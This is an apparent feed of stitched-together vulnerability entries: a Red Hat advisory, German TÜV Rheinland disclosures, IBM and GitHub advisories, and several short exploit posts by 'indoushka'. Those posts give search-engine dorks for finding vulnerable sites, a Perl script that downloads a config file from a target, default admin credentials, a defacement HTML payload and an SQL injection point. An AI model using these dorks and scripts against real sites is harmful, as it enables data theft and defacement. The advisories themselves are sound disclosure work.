Red Hat Security Advisory 2023-3740-01 - This release of Camel for Spring Boot 3.20.1.P1 serves as a replacement for Camel for Spring Boot 3.20.1 and includes bug fixes and enhancements, which are documented in the Release Notes linked in the References. The purpose of this text-only errata is to inform you about the security issues fixed. Issues addressed include a denial of service vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: Red Hat Integration Camel for Spring Boot 3.20.1 Patch 1 release security update  
Advisory ID:       RHSA-2023:3740-01  
Product:           Red Hat Integration  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3740  
Issue date:        2023-06-21  
CVE Names:         CVE-2023-20883 CVE-2023-24815   
=====================================================================

1. Summary:

Red Hat Integration Camel for Spring Boot 3.20.1 Patch 1 release and  
security update is now available.

Red Hat Product Security has rated this update as having an impact of  
Important. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Description:

This release of Camel for Spring Boot 3.20.1.P1 serves as a replacement for  
Camel for Spring Boot 3.20.1 and includes bug fixes and enhancements, which  
are documented in the Release Notes linked in the References. The purpose  
of this text-only errata is to inform you about the security issues fixed.

Security Fix(es):

* vertx-web: StaticHandler disclosure of classpath resources on Windows  
when mounted on a wildcard route (CVE-2023-24815)

* spring-boot: Spring Boot Welcome Page DoS Vulnerability (CVE-2023-20883)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

4. Bugs fixed (https://bugzilla.redhat.com/):

2209342 - CVE-2023-20883 spring-boot: Spring Boot Welcome Page DoS Vulnerability  
2209400 - CVE-2023-24815 vertx-web: StaticHandler disclosure of classpath resources on Windows when mounted on a wildcard route

5. References:

https://access.redhat.com/security/cve/CVE-2023-20883  
https://access.redhat.com/security/cve/CVE-2023-24815  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=red.hat.integration&version=2023-Q2

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZJNxFdzjgjWX9erEAQjgyg/8DIsEGsp2KcG+EMZiGqVlBaafePfT3gP6  
tVOVD4jqsxQYLNa05/IZQtW5Do+0q1vF+ElMq073BgiTXzx6dvD2gppr+Z4DJfAt  
tvigw2uRofa+ycyL7LxtguxuwUEOrroEiCSqV5itQ/VKiPGoWbQ9WW7LJqPoL/l3  
bOywYNbjQ9DIruTwaWt5YbdzYeCPiyh1lW+pG5wzci7m2DZoRu4mR+cV+XsY0XRS  
cGS5UtE60bXpid5CUFVKno26ArmY1twpb3hB8cX2xrjwa9xOpfteffdqp6bLM9Fv  
CfnjBSJLRiOIucR2d3jgWaMFsQlfpxRGfp/1fT9bI3RJ5RO2p0BHUS4ECAeCXCNW  
PhrmMfHKthHeQKSNpWPTKt+XgO1jE8qMATic5/hB3PL6w2KqFs8mSWePrhD3Vo1J  
SktXfBa3Sd1V3TbOz2otcifMCzg7ry95+sSR72Zpu/nQfP+keOsian98FdRlGzV5  
Hh2l98+YgdtmNFp4rwrVCcOLluv/rzt7oG1UBYVM9ATV50fXqtU8KR7YRS3ooNj3  
kaHBDTsUpqdl+iN25jpeDooLZkCKPcGsm7Pg6bUFjYkIHavxFwve9hVxXp9yiVL6  
446ILywCJFF2/hsD7o0Pe4r6Gc9le6zh7C/6kqa+hb1k9aGtcwFnMaNK1H2Y3zni  
4j/W1dDwivU=  
=xseK  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3740-01

WordPress BackUpWordPress version 3.8 appears to leave backups in a world accessible directory under the document root.

    ====================================================================================================================================| # Title     : WordPress BackUpWordPress 3.8 Plugins Backup Disclosure Vulnerability                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://wordpress.org/plugins/backupwordpress/                                                                     |  | # Dork      : "/wp-content/backupwordpress- "                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] appears to leave backups in a world accessible directory under the document root.[+] Use Dork : "/wp-content/backupwordpress- "[+] The search result gives you some websites that took earlier a Wordpress backup.[+] http://127.0.0.1/WordPress3/wp-content/backupwordpress-89c0bd0079-backups/====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

WordPress BackUpWordPress 3.8 Backup Disclosure

Zstore version 6.5.4 suffers from a database disclosure vulnerability.

====================================================================================================================================  
| # Title     : Zstore version 6.5.4 Database Disclosure Exploit                                                                   |  
| # Author    : indoushka                                                                                                          |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit)                                              |   
| # Vendor    : https://github.com/leon-mbs/zstore/releases/tag/6.5.4                                                              |    
| # Dork      : "Zippy склад"                                                                                                      |  
====================================================================================================================================

poc :

[-] Download database backup :

    This file may disclose sensitive information. This information can be used to launch further attacks.

  [+] Dorking İn Google Or Other Search Enggine.

[+] save code as perl file : poc.pl

[+] code :

#!/usr/bin/perl -w  
# Author : indoushka

use LWP::Simple;  
use LWP::UserAgent;

system('cls');  
print "\n[+] Zstore version 6.5.4  Database Disclosure [+] \n\n";  
system('color a');

if(@ARGV < 2)  
{  
print "[+] Author : indoushka \n\n";  
print "[-] How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/db.sql \n";  
print "[+] usage2 : perl $0 localhost /db.sql \n";  
}  
($TargetIP, $path, $File,) = @ARGV;

$File="config/config.ini";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";

my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/db.sql");

if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/.env\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}

Greetings to :=========================================================================================================================  
                                                                                                                                      |  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |          
                                                                                                                                      |  
=======================================================================================================================================

Zstore 6.5.4 Database Disclosure

Ad Manager Pro version 3.05 suffers from a backup disclosure vulnerability.

    ====================================================================================================================================| # Title     : Ad Manager Pro 3.05 Backup Disclosure Vulnerability                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.2(64-bit)                                            | | # Vendor    : http://www.P30vel.ir                                                                                               |  | # Dork      :                                                                                                                    |====================================================================================================================================P0C :[+] appears to leave backups in a world accessible directory under the document root & The plugin exports a backup exported as a text file and contains sensitive informations.[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /admanager/data/[+] https://127.0.0.1/localhost/admanager/data/Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg                      |=======================================================================================================================================

Ad Manager Pro 3.05 Backup Disclosure

Active Matrimonial CMS version 1.4 suffers from an html injection vulnerability.

    ====================================================================================================================================| # Title     : Active Matrimonial CMS v 1.4 HTML inject Vulnerability                                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | | # Vendor    : https://activeitzone.com/                                                                                          |  | # Dork      : "Copyright © 2019 Active Matrimonial CMS - All Rights Reserved "                                                   |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Register new member .[+] Go to edit your profil http://127.0.0.1/xywarscom/home/profile[+] in Introduction box , put your code or use this code for test :<marquee><font color=lime size=32>Hacked by indoushka</font></marquee></tr><td align="center"><a href="https://cxsecurity.com/author/indoushka/1/"><img src="https://cert.cx/cxstatic/images/12018/cxseci.png" alt="" width="650" height="120" border="0"></a></tr>====Greetings to :===================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |=====================================================================================================================================

Active Matrimonial CMS 1.4 HTML Injection

Acon Architecture and Construction Website CMS version 1.2 appears to leave default credentials installed after installation.

    ====================================================================================================================================| # Title     : Acon - Architecture and Construction Website CMS v1.2 Insecure Settings Vulnerability                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://www.mother-of-mangrove.com/xicia/cc/acon/                                                                  |  | # Dork      : Acon - Building and Architecture Website CMS                                                                       |====================================================================================================================================poc :[+] The vulnerability is about leaving the default settings    During the installation of the script and using the default username and password[+]  Dorking In Google Or Other Search Enggine .[+]  use login : Username: admin@gmail.com & Password: 1234 [+]  http://127.0.0.1/www/demoslycom/xicia/cc/acon/admin/  ====Greetings to :===================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |=====================================================================================================================================

Acon Architecture and Construction Website CMS 1.2 Insecure Settings

ACJWEB DESIGNER version 1.0 suffers from a remote SQL injection vulnerability.

    ======================================================================================|| # Title     : ACJWEB DESIGNER 1.0 - SQL Injection Vulnerability                     || # Author    : indoushka                                                             |                                            | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) |                                          | # Vendor    : aluizio81@gmail.com                                                   || # Drok      : inurl:sobre.php?id=                                                   |======================================================================================|poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : http://127.0.0.1/asmac.combr/sobre.php?id= <======inject here[+] login = login.phpGreetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |        =======================================================================================================================================

ACJWEB DESIGNER 1.0 SQL Injection

A reflected cross-site scripting (XSS) vulnerability in DATEV eG Personal-Management System Comfort/Comfort Plus v15.1.0 to v16.1.1 P4 allows attackers to steal targeted users' login data by sending a crafted link.

**Sicherheitslücke im Bewerberportal "Datev Personal-Managementsystem comfort/comfort plus" der Firma DATEV eG**

Der Sicherheitsforscher Max Bäumler, von der TÜV Rheinland i-sec GmbH hat eine Sicherheitslücke im Bewerberportal "Datev Personal-Managementsystem comfort/comfort plus" der Firma DATEV eG entdeckt. Betroffen sind die Versionen 15.1.0 P6 (vermutlich ab 15.1.0) - 16.1.1 P1 (vermutlich bis 16.1.1 P3).

DATEV eG wurde am 25.04.2023 über die Schwachstelle informiert. Ein Sicherheitsupdate mit der Versionsnummer 16.1.1 P4 wurde am 28.04.2023 bereitgestellt, welches diese Schwachstelle behebt. Dieser Patch ist unter nachfolgender URL zum Download bereitgestellt: https://support.veda.net/datev.php Es wird empfohlen, dass Betroffene Nutzer diesen Patch sobald wie möglich einspielen.

Die Schwachstelle wurde mit der Kennung CVE-2023-33387 versehen und hat einen hohen CVSS-Schweregrad 7,1 von 10.

Einem potenziellen Angreifer ist es möglich, sofern ein Nutzer einen vom Angreifer manipulierten Link anklickt, die Zugangsdaten des Nutzers abzugreifen wenn dieser sich einloggt. Dadurch kann er Zugriff auf die persönlichen Daten des Nutzers wie z. B. Bewerbungsunterlagen erhalten.

Die Forscher der TÜV Rheinland i-sec GmbH bedanken sich bei DATEV eG für die professionelle Zusammenarbeit sowie die ihr Engagement um eine zeitnahe Bereitstellung des Sicherheitsupdates.

**ENOVIA V6 - Mehrere Sicherheitslücken ermöglichen Remote-Code-Ausführung**

Sicherheitsforscher Shadi Habbal, von der TÜV Rheinland i-sec GmbH, hat zwei Sicherheitslücken in "ENOVIA V6", einem Produkt von Dassault Systèmes, entdeckt. Bei den entdeckten Schwachstellen handelt es sich um XSLT- und XXE-Injektionen, die verkettet werden können, um Remotecodeausführung auf den betroffenen Systemen zu erreichen. Die Schwachstellen wurden während einer Red-Team-Kampagne entdeckt.

Die betroffene Version von ENOVIA ist „V6R2013xE“.

Dassault Systèmes wurde am 10. August 2022 über diese Sicherheitslücke informiert, und am 28. November 2022 wurde ein Fix veröffentlicht. Der Patch behebt die Sicherheitslücken in der unterstützten Version. Es ist wichtig, dass Benutzer der betroffenen Versionen von ENOVIA den Patch so bald wie möglich installieren.

Den Schwachstellen wurden die Kennungen CVE-2023-1288 und CVE-2023-1287 zugewiesen und haben einen hohen Schweregrad.

TÜV Rheinland i-sec GmbH bedankt sich bei Dassault Systèmes für Ihr Engagement, die Schwachstellen zu beheben.

**baramundi Management Agent - Von Buffer-Overflow zu Remote-Code-Execution**

Der Sicherheitsforscher Shadi Habbal von TÜV Rheinland i-sec GmbH hat eine Buffer Overflow-Schwachstelle in dem „baramundi Management Agent“ (bMA), einem Modul der „baramundi Management Suite“ (bMS), entdeckt. Ein Angreifer könnte möglicherweise diese Schwachstelle ausnutzen, um das betroffene Modul abstürzen zu lassen oder bei Erfüllung bestimmter Bedingung, z. B. CVE-2022-44654, Remote-Code-Execution zu erreichen. In beiden Szenarien müssen Angreifende in der Lage sein, den oder die Benutzer\*in dazu zu bringen, eine vorbereitete bzw. manipulierte Webseite zu besuchen, die im Internet/Intranet gehostet wird.

Betroffene Produkte sind alle Versionen von baramundi, einschließlich bMS 2022 R1, bMS 2021 R2, bMS 2021 R1 und früher.

baramundi AG wurde am 04.08.2022 über diese Schwachstelle informiert und das Sicherheitsupdate "S-2022-01" wurde am 27.09.2022 veröffentlicht. Das Sicherheitsupdate behebt die Schwachstelle in allen unterstützten Versionen. Es ist wichtig, dass Benutzer von betroffenen Versionen von baramundi den Patch so schnell wie möglich installieren.

Die Schwachstelle wurde mit der Kennung CVE-2022-43747 zugewiesen und hat einen hohen Schweregrad.

Der Forscher und die TÜV Rheinland i-sec GmbH möchten dem Product-Security-Incident-Response-Team von baramundi für die professionelle Kommunikation und baramundis Engagement bei der Beseitigung dieser Schwachstelle danken.

**Trend Micro Apex One - Schwachstelle in UMH-Monitoring-Engine-Module**

Sicherheitsforscher Shadi Habbal von der TÜV Rheinland i-sec GmbH hat eine Schwachstelle im User-Mode-Hooking (UMH) Monitoring-Engine-Modul von Trend Micro Apex One und Apex One as a Service entdeckt. Diesem Modul fehlt eine wichtige Sicherheitsfeature namens "SafeSEH". Das Modul hilft bei der Überwachung auf bösartige Nutzdaten unter Windows, indem es sich selbst in jeden Prozess im Benutzermodus injiziert und in bestimmte Windows-APIs einhakt.

Das Fehlen des "SafeSEH"-Schutzes macht das Modul angreifbar. Ein Angreifer könnte eine SEH-basierte Pufferüberlauf-Schwachstelle so ausnutzen, dass mithilfe dieser Schwachstelle eine wichtige Voraussetzung erfüllt wird, um Sicherheitsmaßnahmen zu umgehen und der betroffenen Software oder dem Gerät, auf dem sie läuft, Schaden zuzufügen. Diese Schwachstelle betrifft Apex One 2019 (On-Premises) und Apex One as a Service.

Trend Micro wurde am 8.08.2022 über diese Schwachstelle informiert und ein Fix wurde am 25.10.2022 veröffentlicht. Es wird empfohlen, dass Benutzer der betroffenen Versionen von Apex One diesen Patch oder den letzten verfügbaren kumulativen Patch so schnell wie möglich installieren. Die Schwachstelle wurde mit der Kennung CVE-2022-44654 versehen und hat einen CVSS-Schweregrad 7,5 von 10.

Die TÜV Rheinland i-sec GmbH dankt dem Product-Security-Incident-Response-Team von Trend Micro für die professionelle Kommunikation und für das Engagement von Trend Micro bei der Behebung dieser Schwachstelle.

**Lokale Rechteausweitung-Schwachstelle in otris “Update Manager”**

"Update Manager" in der Version 1.2.1.0 (und möglicherweise früher), eine Softwarekomponente der otris software AG, die von mehreren otris-Anwendungen, z.B. otris Privacy, verwendet wird, um die Aktualisierung von otris-Produkten zu erleichtern; ermöglicht Angreifern, ihre Rechte auf Windows-Systemen auf SYSTEM (höchste Berechtigung unter Windows) zu erweitern, indem sie eine Schwachstelle in der oben genannten Software ausnutzen.

Bekannte betroffene otris-Produkte sind otris Privacy < v7.0.7. Andere otris-Produkte, die die betroffene Software verwenden, könnten ebenfalls betroffen sein.

Unternehmen wird empfohlen zu prüfen, ob die oben genannte Software auf ihren Systemen im Einsatz ist und sich bei der otris software AG nach aktuellen Versionen zu erkundigen.

Sicherheitsforscher Shadi Habbal von der TÜV Rheinland i-sec GmbH entdeckte die Schwachstelle während eines aktiven Penetrationstests und nutzte die Schwachstelle erfolgreich als Proof-of-Concept aus.

Die Schwachstelle wurde am 01.09.2021 an die otris software AG gemeldet. Der otris software AG wurde eine Frist von 90 Tagen eingeräumt, um einen Fix zu veröffentlichen. Weitere 60 Tage wurden gewährt, um Unternehmen bei der Aktualisierung ihrer Systeme zu unterstützen.

Die Schwachstelle wurde nach Aussage von otris behoben und das Produkt im Anschluss einem Penetrationstest unterzogen.

Die Schwachstelle wurde CVE-2021-40376 zugeordnet. Weitere technische Einzelheiten finden Sie in dem beigefügten PDF-Dokument.

CVE-2023-33387: TÜV Rheinland – Aufgedeckte Schwachstellen

IBM SPSS Modeler on Windows 17.0, 18.0, 18.2.2, 18.3, 18.4, and 18.5 requires the end user to have access to the server SSL key which could allow a local user to decrypt and obtain sensitive information.  IBM X-Force ID:  256117.

CVE-2023-33842: IBM SPSS Modeler information disclosure CVE-2023-33842 Vulnerability Report

On Windows, it is possible to open a `livebook://` link from a browser which opens Livebook Desktop and triggers arbitrary code execution on victim's machine.

Any user using Livebook Desktop on Windows is potentially vulnerable to arbitrary code execution when they expect Livebook to be opened from browser.



Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2023-35174

**Livebook Desktop's protocol handler can be exploited to execute arbitrary command on Windows**

**Package**

**Affected versions**

\>= 0.8.0, < 0.8.2

\>= 0.9.0, < 0.9.3

**Patched versions**

0.8.2

0.9.3

**Description**

Published to the GitHub Advisory Database

Jun 21, 2023

**Weaknesses**

**GHSA ID**

GHSA-564w-97r7-c6p9

**Source code**

Tag

#windows